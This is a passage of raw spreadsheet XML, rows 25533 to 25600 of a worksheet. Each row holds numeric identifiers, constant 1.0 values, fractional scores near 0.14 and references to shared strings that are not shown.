      <c r="C25533" s="2" t="s">
        <v>24557</v>
      </c>
      <c r="D25533" s="2">
        <v>1.0</v>
      </c>
      <c r="E25533" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25533" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="25534" ht="15.75" customHeight="1">
      <c r="A25534" s="1">
        <v>27989.0</v>
      </c>
      <c r="B25534" s="2">
        <v>2.4060541E7</v>
      </c>
      <c r="C25534" s="2" t="s">
        <v>24558</v>
      </c>
      <c r="D25534" s="2">
        <v>1.0</v>
      </c>
      <c r="E25534" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25534" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="25535" ht="15.75" customHeight="1">
      <c r="A25535" s="1">
        <v>31469.0</v>
      </c>
      <c r="B25535" s="2">
        <v>5045519.0</v>
      </c>
      <c r="C25535" s="2" t="s">
        <v>24559</v>
      </c>
      <c r="D25535" s="2">
        <v>1.0</v>
      </c>
      <c r="E25535" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25535" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="25536" ht="15.75" customHeight="1">
      <c r="A25536" s="1">
        <v>31690.0</v>
      </c>
      <c r="B25536" s="2">
        <v>5192460.0</v>
      </c>
      <c r="C25536" s="2" t="s">
        <v>24560</v>
      </c>
      <c r="D25536" s="2">
        <v>1.0</v>
      </c>
      <c r="E25536" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25536" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="25537" ht="15.75" customHeight="1">
      <c r="A25537" s="1">
        <v>33189.0</v>
      </c>
      <c r="B25537" s="2">
        <v>7125506.0</v>
      </c>
      <c r="C25537" s="2" t="s">
        <v>24561</v>
      </c>
      <c r="D25537" s="2">
        <v>1.0</v>
      </c>
      <c r="E25537" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25537" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="25538" ht="15.75" customHeight="1">
      <c r="A25538" s="1">
        <v>33910.0</v>
      </c>
      <c r="B25538" s="2">
        <v>9222961.0</v>
      </c>
      <c r="C25538" s="2" t="s">
        <v>24562</v>
      </c>
      <c r="D25538" s="2">
        <v>1.0</v>
      </c>
      <c r="E25538" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25538" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="25539" ht="15.75" customHeight="1">
      <c r="A25539" s="1">
        <v>31056.0</v>
      </c>
      <c r="B25539" s="2">
        <v>4.7989201E7</v>
      </c>
      <c r="C25539" s="2" t="s">
        <v>24563</v>
      </c>
      <c r="D25539" s="2">
        <v>1.0</v>
      </c>
      <c r="E25539" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25539" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="25540" ht="15.75" customHeight="1">
      <c r="A25540" s="1">
        <v>25065.0</v>
      </c>
      <c r="B25540" s="2">
        <v>1.2874085E7</v>
      </c>
      <c r="C25540" s="2" t="s">
        <v>24564</v>
      </c>
      <c r="D25540" s="2">
        <v>1.0</v>
      </c>
      <c r="E25540" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25540" s="2">
        <v>0.1427203065134101</v>
      </c>
    </row>
    <row r="25541" ht="15.75" customHeight="1">
      <c r="A25541" s="1">
        <v>28636.0</v>
      </c>
      <c r="B25541" s="2">
        <v>2.7299445E7</v>
      </c>
      <c r="C25541" s="2" t="s">
        <v>24565</v>
      </c>
      <c r="D25541" s="2">
        <v>1.0</v>
      </c>
      <c r="E25541" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25541" s="2">
        <v>0.1427203065134101</v>
      </c>
    </row>
    <row r="25542" ht="15.75" customHeight="1">
      <c r="A25542" s="1">
        <v>21478.0</v>
      </c>
      <c r="B25542" s="2">
        <v>2.297601E7</v>
      </c>
      <c r="C25542" s="2" t="s">
        <v>24566</v>
      </c>
      <c r="D25542" s="2">
        <v>1.0</v>
      </c>
      <c r="E25542" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25542" s="2">
        <v>0.14272030651341</v>
      </c>
    </row>
    <row r="25543" ht="15.75" customHeight="1">
      <c r="A25543" s="1">
        <v>22212.0</v>
      </c>
      <c r="B25543" s="2">
        <v>3.2166601E7</v>
      </c>
      <c r="C25543" s="2" t="s">
        <v>24567</v>
      </c>
      <c r="D25543" s="2">
        <v>1.0</v>
      </c>
      <c r="E25543" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25543" s="2">
        <v>0.14272030651341</v>
      </c>
    </row>
    <row r="25544" ht="15.75" customHeight="1">
      <c r="A25544" s="1">
        <v>30872.0</v>
      </c>
      <c r="B25544" s="2">
        <v>4.6290052E7</v>
      </c>
      <c r="C25544" s="2" t="s">
        <v>24568</v>
      </c>
      <c r="D25544" s="2">
        <v>1.0</v>
      </c>
      <c r="E25544" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25544" s="2">
        <v>0.1424731182795699</v>
      </c>
    </row>
    <row r="25545" ht="15.75" customHeight="1">
      <c r="A25545" s="1">
        <v>10995.0</v>
      </c>
      <c r="B25545" s="2">
        <v>1.7448608E7</v>
      </c>
      <c r="C25545" s="2" t="s">
        <v>24569</v>
      </c>
      <c r="D25545" s="2">
        <v>1.0</v>
      </c>
      <c r="E25545" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25545" s="2">
        <v>0.1424242424242424</v>
      </c>
    </row>
    <row r="25546" ht="15.75" customHeight="1">
      <c r="A25546" s="1">
        <v>30129.0</v>
      </c>
      <c r="B25546" s="2">
        <v>3696943.0</v>
      </c>
      <c r="C25546" s="2" t="s">
        <v>24570</v>
      </c>
      <c r="D25546" s="2">
        <v>1.0</v>
      </c>
      <c r="E25546" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25546" s="2">
        <v>0.1418650793650794</v>
      </c>
    </row>
    <row r="25547" ht="15.75" customHeight="1">
      <c r="A25547" s="1">
        <v>32831.0</v>
      </c>
      <c r="B25547" s="2">
        <v>6240383.0</v>
      </c>
      <c r="C25547" s="2" t="s">
        <v>24571</v>
      </c>
      <c r="D25547" s="2">
        <v>1.0</v>
      </c>
      <c r="E25547" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25547" s="2">
        <v>0.1418650793650794</v>
      </c>
    </row>
    <row r="25548" ht="15.75" customHeight="1">
      <c r="A25548" s="1">
        <v>624.0</v>
      </c>
      <c r="B25548" s="2">
        <v>1.9552718E7</v>
      </c>
      <c r="C25548" s="2" t="s">
        <v>24572</v>
      </c>
      <c r="D25548" s="2">
        <v>1.0</v>
      </c>
      <c r="E25548" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25548" s="2">
        <v>0.1416666666666667</v>
      </c>
    </row>
    <row r="25549" ht="15.75" customHeight="1">
      <c r="A25549" s="1">
        <v>33715.0</v>
      </c>
      <c r="B25549" s="2">
        <v>8512122.0</v>
      </c>
      <c r="C25549" s="2" t="s">
        <v>24573</v>
      </c>
      <c r="D25549" s="2">
        <v>1.0</v>
      </c>
      <c r="E25549" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25549" s="2">
        <v>0.1414930555555556</v>
      </c>
    </row>
    <row r="25550" ht="15.75" customHeight="1">
      <c r="A25550" s="1">
        <v>11141.0</v>
      </c>
      <c r="B25550" s="2">
        <v>1.9269715E7</v>
      </c>
      <c r="C25550" s="2" t="s">
        <v>24574</v>
      </c>
      <c r="D25550" s="2">
        <v>1.0</v>
      </c>
      <c r="E25550" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25550" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="25551" ht="15.75" customHeight="1">
      <c r="A25551" s="1">
        <v>11674.0</v>
      </c>
      <c r="B25551" s="2">
        <v>2.3404573E7</v>
      </c>
      <c r="C25551" s="2" t="s">
        <v>24575</v>
      </c>
      <c r="D25551" s="2">
        <v>1.0</v>
      </c>
      <c r="E25551" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25551" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="25552" ht="15.75" customHeight="1">
      <c r="A25552" s="1">
        <v>12909.0</v>
      </c>
      <c r="B25552" s="2">
        <v>3.2155868E7</v>
      </c>
      <c r="C25552" s="2" t="s">
        <v>24576</v>
      </c>
      <c r="D25552" s="2">
        <v>1.0</v>
      </c>
      <c r="E25552" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25552" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="25553" ht="15.75" customHeight="1">
      <c r="A25553" s="1">
        <v>30838.0</v>
      </c>
      <c r="B25553" s="2">
        <v>4.5680405E7</v>
      </c>
      <c r="C25553" s="2" t="s">
        <v>24577</v>
      </c>
      <c r="D25553" s="2">
        <v>1.0</v>
      </c>
      <c r="E25553" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25553" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="25554" ht="15.75" customHeight="1">
      <c r="A25554" s="1">
        <v>32640.0</v>
      </c>
      <c r="B25554" s="2">
        <v>5857361.0</v>
      </c>
      <c r="C25554" s="2" t="s">
        <v>24578</v>
      </c>
      <c r="D25554" s="2">
        <v>1.0</v>
      </c>
      <c r="E25554" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25554" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="25555" ht="15.75" customHeight="1">
      <c r="A25555" s="1">
        <v>34200.0</v>
      </c>
      <c r="B25555" s="2">
        <v>1.0896862E7</v>
      </c>
      <c r="C25555" s="2" t="s">
        <v>24579</v>
      </c>
      <c r="D25555" s="2">
        <v>1.0</v>
      </c>
      <c r="E25555" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25555" s="2">
        <v>0.1411657559198543</v>
      </c>
    </row>
    <row r="25556" ht="15.75" customHeight="1">
      <c r="A25556" s="1">
        <v>16148.0</v>
      </c>
      <c r="B25556" s="2">
        <v>4.5577183E7</v>
      </c>
      <c r="C25556" s="2" t="s">
        <v>24580</v>
      </c>
      <c r="D25556" s="2">
        <v>1.0</v>
      </c>
      <c r="E25556" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25556" s="2">
        <v>0.1410256410256411</v>
      </c>
    </row>
    <row r="25557" ht="15.75" customHeight="1">
      <c r="A25557" s="1">
        <v>17620.0</v>
      </c>
      <c r="B25557" s="2">
        <v>5.0365563E7</v>
      </c>
      <c r="C25557" s="2" t="s">
        <v>24581</v>
      </c>
      <c r="D25557" s="2">
        <v>1.0</v>
      </c>
      <c r="E25557" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25557" s="2">
        <v>0.1410256410256411</v>
      </c>
    </row>
    <row r="25558" ht="15.75" customHeight="1">
      <c r="A25558" s="1">
        <v>6904.0</v>
      </c>
      <c r="B25558" s="2">
        <v>4.9814134E7</v>
      </c>
      <c r="C25558" s="2" t="s">
        <v>24582</v>
      </c>
      <c r="D25558" s="2">
        <v>1.0</v>
      </c>
      <c r="E25558" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25558" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="25559" ht="15.75" customHeight="1">
      <c r="A25559" s="1">
        <v>11680.0</v>
      </c>
      <c r="B25559" s="2">
        <v>2.344044E7</v>
      </c>
      <c r="C25559" s="2" t="s">
        <v>24583</v>
      </c>
      <c r="D25559" s="2">
        <v>1.0</v>
      </c>
      <c r="E25559" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25559" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="25560" ht="15.75" customHeight="1">
      <c r="A25560" s="1">
        <v>14457.0</v>
      </c>
      <c r="B25560" s="2">
        <v>3.9440419E7</v>
      </c>
      <c r="C25560" s="2" t="s">
        <v>24584</v>
      </c>
      <c r="D25560" s="2">
        <v>1.0</v>
      </c>
      <c r="E25560" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25560" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="25561" ht="15.75" customHeight="1">
      <c r="A25561" s="1">
        <v>15596.0</v>
      </c>
      <c r="B25561" s="2">
        <v>4.3462739E7</v>
      </c>
      <c r="C25561" s="2" t="s">
        <v>24585</v>
      </c>
      <c r="D25561" s="2">
        <v>1.0</v>
      </c>
      <c r="E25561" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25561" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="25562" ht="15.75" customHeight="1">
      <c r="A25562" s="1">
        <v>20234.0</v>
      </c>
      <c r="B25562" s="2">
        <v>1.0839667E7</v>
      </c>
      <c r="C25562" s="2" t="s">
        <v>24586</v>
      </c>
      <c r="D25562" s="2">
        <v>1.0</v>
      </c>
      <c r="E25562" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25562" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="25563" ht="15.75" customHeight="1">
      <c r="A25563" s="1">
        <v>21086.0</v>
      </c>
      <c r="B25563" s="2">
        <v>1.8043958E7</v>
      </c>
      <c r="C25563" s="2" t="s">
        <v>24587</v>
      </c>
      <c r="D25563" s="2">
        <v>1.0</v>
      </c>
      <c r="E25563" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25563" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="25564" ht="15.75" customHeight="1">
      <c r="A25564" s="1">
        <v>21479.0</v>
      </c>
      <c r="B25564" s="2">
        <v>2.297601E7</v>
      </c>
      <c r="C25564" s="2" t="s">
        <v>24588</v>
      </c>
      <c r="D25564" s="2">
        <v>1.0</v>
      </c>
      <c r="E25564" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25564" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="25565" ht="15.75" customHeight="1">
      <c r="A25565" s="1">
        <v>22213.0</v>
      </c>
      <c r="B25565" s="2">
        <v>3.2166601E7</v>
      </c>
      <c r="C25565" s="2" t="s">
        <v>24589</v>
      </c>
      <c r="D25565" s="2">
        <v>1.0</v>
      </c>
      <c r="E25565" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25565" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="25566" ht="15.75" customHeight="1">
      <c r="A25566" s="1">
        <v>22690.0</v>
      </c>
      <c r="B25566" s="2">
        <v>4.2239455E7</v>
      </c>
      <c r="C25566" s="2" t="s">
        <v>24590</v>
      </c>
      <c r="D25566" s="2">
        <v>1.0</v>
      </c>
      <c r="E25566" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25566" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="25567" ht="15.75" customHeight="1">
      <c r="A25567" s="1">
        <v>22862.0</v>
      </c>
      <c r="B25567" s="2">
        <v>4.7229809E7</v>
      </c>
      <c r="C25567" s="2" t="s">
        <v>24591</v>
      </c>
      <c r="D25567" s="2">
        <v>1.0</v>
      </c>
      <c r="E25567" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25567" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="25568" ht="15.75" customHeight="1">
      <c r="A25568" s="1">
        <v>22956.0</v>
      </c>
      <c r="B25568" s="2">
        <v>4903911.0</v>
      </c>
      <c r="C25568" s="2" t="s">
        <v>24592</v>
      </c>
      <c r="D25568" s="2">
        <v>1.0</v>
      </c>
      <c r="E25568" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25568" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="25569" ht="15.75" customHeight="1">
      <c r="A25569" s="1">
        <v>23700.0</v>
      </c>
      <c r="B25569" s="2">
        <v>7082770.0</v>
      </c>
      <c r="C25569" s="2" t="s">
        <v>24592</v>
      </c>
      <c r="D25569" s="2">
        <v>1.0</v>
      </c>
      <c r="E25569" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25569" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="25570" ht="15.75" customHeight="1">
      <c r="A25570" s="1">
        <v>24416.0</v>
      </c>
      <c r="B25570" s="2">
        <v>1.0839666E7</v>
      </c>
      <c r="C25570" s="2" t="s">
        <v>24586</v>
      </c>
      <c r="D25570" s="2">
        <v>1.0</v>
      </c>
      <c r="E25570" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25570" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="25571" ht="15.75" customHeight="1">
      <c r="A25571" s="1">
        <v>24760.0</v>
      </c>
      <c r="B25571" s="2">
        <v>1.1817313E7</v>
      </c>
      <c r="C25571" s="2" t="s">
        <v>24593</v>
      </c>
      <c r="D25571" s="2">
        <v>1.0</v>
      </c>
      <c r="E25571" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25571" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="25572" ht="15.75" customHeight="1">
      <c r="A25572" s="1">
        <v>26631.0</v>
      </c>
      <c r="B25572" s="2">
        <v>1.8043957E7</v>
      </c>
      <c r="C25572" s="2" t="s">
        <v>24587</v>
      </c>
      <c r="D25572" s="2">
        <v>1.0</v>
      </c>
      <c r="E25572" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25572" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="25573" ht="15.75" customHeight="1">
      <c r="A25573" s="1">
        <v>27961.0</v>
      </c>
      <c r="B25573" s="2">
        <v>2.3928196E7</v>
      </c>
      <c r="C25573" s="2" t="s">
        <v>24594</v>
      </c>
      <c r="D25573" s="2">
        <v>1.0</v>
      </c>
      <c r="E25573" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25573" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="25574" ht="15.75" customHeight="1">
      <c r="A25574" s="1">
        <v>28366.0</v>
      </c>
      <c r="B25574" s="2">
        <v>2.6035685E7</v>
      </c>
      <c r="C25574" s="2" t="s">
        <v>24595</v>
      </c>
      <c r="D25574" s="2">
        <v>1.0</v>
      </c>
      <c r="E25574" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25574" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="25575" ht="15.75" customHeight="1">
      <c r="A25575" s="1">
        <v>28968.0</v>
      </c>
      <c r="B25575" s="2">
        <v>2.9812644E7</v>
      </c>
      <c r="C25575" s="2" t="s">
        <v>24596</v>
      </c>
      <c r="D25575" s="2">
        <v>1.0</v>
      </c>
      <c r="E25575" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25575" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="25576" ht="15.75" customHeight="1">
      <c r="A25576" s="1">
        <v>31163.0</v>
      </c>
      <c r="B25576" s="2">
        <v>4903910.0</v>
      </c>
      <c r="C25576" s="2" t="s">
        <v>24597</v>
      </c>
      <c r="D25576" s="2">
        <v>1.0</v>
      </c>
      <c r="E25576" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25576" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="25577" ht="15.75" customHeight="1">
      <c r="A25577" s="1">
        <v>31726.0</v>
      </c>
      <c r="B25577" s="2">
        <v>5.2136693E7</v>
      </c>
      <c r="C25577" s="2" t="s">
        <v>24598</v>
      </c>
      <c r="D25577" s="2">
        <v>1.0</v>
      </c>
      <c r="E25577" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25577" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="25578" ht="15.75" customHeight="1">
      <c r="A25578" s="1">
        <v>10851.0</v>
      </c>
      <c r="B25578" s="2">
        <v>1.619992E7</v>
      </c>
      <c r="C25578" s="2" t="s">
        <v>24599</v>
      </c>
      <c r="D25578" s="2">
        <v>1.0</v>
      </c>
      <c r="E25578" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25578" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="25579" ht="15.75" customHeight="1">
      <c r="A25579" s="1">
        <v>21654.0</v>
      </c>
      <c r="B25579" s="2">
        <v>2.4933013E7</v>
      </c>
      <c r="C25579" s="2" t="s">
        <v>24600</v>
      </c>
      <c r="D25579" s="2">
        <v>1.0</v>
      </c>
      <c r="E25579" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25579" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="25580" ht="15.75" customHeight="1">
      <c r="A25580" s="1">
        <v>21776.0</v>
      </c>
      <c r="B25580" s="2">
        <v>2.6427208E7</v>
      </c>
      <c r="C25580" s="2" t="s">
        <v>24601</v>
      </c>
      <c r="D25580" s="2">
        <v>1.0</v>
      </c>
      <c r="E25580" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25580" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="25581" ht="15.75" customHeight="1">
      <c r="A25581" s="1">
        <v>23816.0</v>
      </c>
      <c r="B25581" s="2">
        <v>7969460.0</v>
      </c>
      <c r="C25581" s="2" t="s">
        <v>24602</v>
      </c>
      <c r="D25581" s="2">
        <v>1.0</v>
      </c>
      <c r="E25581" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25581" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="25582" ht="15.75" customHeight="1">
      <c r="A25582" s="1">
        <v>24434.0</v>
      </c>
      <c r="B25582" s="2">
        <v>1.0856055E7</v>
      </c>
      <c r="C25582" s="2" t="s">
        <v>24603</v>
      </c>
      <c r="D25582" s="2">
        <v>1.0</v>
      </c>
      <c r="E25582" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25582" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="25583" ht="15.75" customHeight="1">
      <c r="A25583" s="1">
        <v>28035.0</v>
      </c>
      <c r="B25583" s="2">
        <v>2.4455083E7</v>
      </c>
      <c r="C25583" s="2" t="s">
        <v>24604</v>
      </c>
      <c r="D25583" s="2">
        <v>1.0</v>
      </c>
      <c r="E25583" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25583" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="25584" ht="15.75" customHeight="1">
      <c r="A25584" s="1">
        <v>28165.0</v>
      </c>
      <c r="B25584" s="2">
        <v>2.4933012E7</v>
      </c>
      <c r="C25584" s="2" t="s">
        <v>24605</v>
      </c>
      <c r="D25584" s="2">
        <v>1.0</v>
      </c>
      <c r="E25584" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25584" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="25585" ht="15.75" customHeight="1">
      <c r="A25585" s="1">
        <v>28429.0</v>
      </c>
      <c r="B25585" s="2">
        <v>2.6427207E7</v>
      </c>
      <c r="C25585" s="2" t="s">
        <v>24606</v>
      </c>
      <c r="D25585" s="2">
        <v>1.0</v>
      </c>
      <c r="E25585" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25585" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="25586" ht="15.75" customHeight="1">
      <c r="A25586" s="1">
        <v>28475.0</v>
      </c>
      <c r="B25586" s="2">
        <v>2.6616976E7</v>
      </c>
      <c r="C25586" s="2" t="s">
        <v>24607</v>
      </c>
      <c r="D25586" s="2">
        <v>1.0</v>
      </c>
      <c r="E25586" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25586" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="25587" ht="15.75" customHeight="1">
      <c r="A25587" s="1">
        <v>31661.0</v>
      </c>
      <c r="B25587" s="2">
        <v>5.1751558E7</v>
      </c>
      <c r="C25587" s="2" t="s">
        <v>24608</v>
      </c>
      <c r="D25587" s="2">
        <v>1.0</v>
      </c>
      <c r="E25587" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25587" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="25588" ht="15.75" customHeight="1">
      <c r="A25588" s="1">
        <v>27352.0</v>
      </c>
      <c r="B25588" s="2">
        <v>2.1511371E7</v>
      </c>
      <c r="C25588" s="2" t="s">
        <v>24609</v>
      </c>
      <c r="D25588" s="2">
        <v>1.0</v>
      </c>
      <c r="E25588" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25588" s="2">
        <v>0.1407914764079148</v>
      </c>
    </row>
    <row r="25589" ht="15.75" customHeight="1">
      <c r="A25589" s="1">
        <v>20103.0</v>
      </c>
      <c r="B25589" s="2">
        <v>9817092.0</v>
      </c>
      <c r="C25589" s="2" t="s">
        <v>24610</v>
      </c>
      <c r="D25589" s="2">
        <v>1.0</v>
      </c>
      <c r="E25589" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25589" s="2">
        <v>0.1406810035842295</v>
      </c>
    </row>
    <row r="25590" ht="15.75" customHeight="1">
      <c r="A25590" s="1">
        <v>507.0</v>
      </c>
      <c r="B25590" s="2">
        <v>1.8109208E7</v>
      </c>
      <c r="C25590" s="2" t="s">
        <v>24611</v>
      </c>
      <c r="D25590" s="2">
        <v>1.0</v>
      </c>
      <c r="E25590" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25590" s="2">
        <v>0.1404040404040404</v>
      </c>
    </row>
    <row r="25591" ht="15.75" customHeight="1">
      <c r="A25591" s="1">
        <v>23463.0</v>
      </c>
      <c r="B25591" s="2">
        <v>5.7017822E7</v>
      </c>
      <c r="C25591" s="2" t="s">
        <v>24612</v>
      </c>
      <c r="D25591" s="2">
        <v>1.0</v>
      </c>
      <c r="E25591" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25591" s="2">
        <v>0.1404040404040404</v>
      </c>
    </row>
    <row r="25592" ht="15.75" customHeight="1">
      <c r="A25592" s="1">
        <v>31538.0</v>
      </c>
      <c r="B25592" s="2">
        <v>5095178.0</v>
      </c>
      <c r="C25592" s="2" t="s">
        <v>24613</v>
      </c>
      <c r="D25592" s="2">
        <v>1.0</v>
      </c>
      <c r="E25592" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25592" s="2">
        <v>0.1404040404040404</v>
      </c>
    </row>
    <row r="25593" ht="15.75" customHeight="1">
      <c r="A25593" s="1">
        <v>3389.0</v>
      </c>
      <c r="B25593" s="2">
        <v>3.79619E7</v>
      </c>
      <c r="C25593" s="2" t="s">
        <v>24614</v>
      </c>
      <c r="D25593" s="2">
        <v>1.0</v>
      </c>
      <c r="E25593" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25593" s="2">
        <v>0.14030131826742</v>
      </c>
    </row>
    <row r="25594" ht="15.75" customHeight="1">
      <c r="A25594" s="1">
        <v>29214.0</v>
      </c>
      <c r="B25594" s="2">
        <v>3.0788888E7</v>
      </c>
      <c r="C25594" s="2" t="s">
        <v>24615</v>
      </c>
      <c r="D25594" s="2">
        <v>1.0</v>
      </c>
      <c r="E25594" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25594" s="2">
        <v>0.14030131826742</v>
      </c>
    </row>
    <row r="25595" ht="15.75" customHeight="1">
      <c r="A25595" s="1">
        <v>29995.0</v>
      </c>
      <c r="B25595" s="2">
        <v>3612218.0</v>
      </c>
      <c r="C25595" s="2" t="s">
        <v>24616</v>
      </c>
      <c r="D25595" s="2">
        <v>1.0</v>
      </c>
      <c r="E25595" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25595" s="2">
        <v>0.14030131826742</v>
      </c>
    </row>
    <row r="25596" ht="15.75" customHeight="1">
      <c r="A25596" s="1">
        <v>30339.0</v>
      </c>
      <c r="B25596" s="2">
        <v>3.8155053E7</v>
      </c>
      <c r="C25596" s="2" t="s">
        <v>24617</v>
      </c>
      <c r="D25596" s="2">
        <v>1.0</v>
      </c>
      <c r="E25596" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25596" s="2">
        <v>0.1398809523809524</v>
      </c>
    </row>
    <row r="25597" ht="15.75" customHeight="1">
      <c r="A25597" s="1">
        <v>13589.0</v>
      </c>
      <c r="B25597" s="2">
        <v>3.5728209E7</v>
      </c>
      <c r="C25597" s="2" t="s">
        <v>24618</v>
      </c>
      <c r="D25597" s="2">
        <v>1.0</v>
      </c>
      <c r="E25597" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25597" s="2">
        <v>0.1398148148148149</v>
      </c>
    </row>
    <row r="25598" ht="15.75" customHeight="1">
      <c r="A25598" s="1">
        <v>32755.0</v>
      </c>
      <c r="B25598" s="2">
        <v>6053862.0</v>
      </c>
      <c r="C25598" s="2" t="s">
        <v>24619</v>
      </c>
      <c r="D25598" s="2">
        <v>1.0</v>
      </c>
      <c r="E25598" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25598" s="2">
        <v>0.1398148148148149</v>
      </c>
    </row>
    <row r="25599" ht="15.75" customHeight="1">
      <c r="A25599" s="1">
        <v>26946.0</v>
      </c>
      <c r="B25599" s="2">
        <v>1.9579619E7</v>
      </c>
      <c r="C25599" s="2" t="s">
        <v>24620</v>
      </c>
      <c r="D25599" s="2">
        <v>1.0</v>
      </c>
      <c r="E25599" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25599" s="2">
        <v>0.1398148148148148</v>
      </c>
    </row>
    <row r="25600" ht="15.75" customHeight="1">
      <c r="A25600" s="1">
        <v>31976.0</v>
      </c>
      <c r="B25600" s="2">
        <v>5316476.0</v>
      </c>
      <c r="C25600" s="2" t="s">
        <v>24621</v>
      </c>
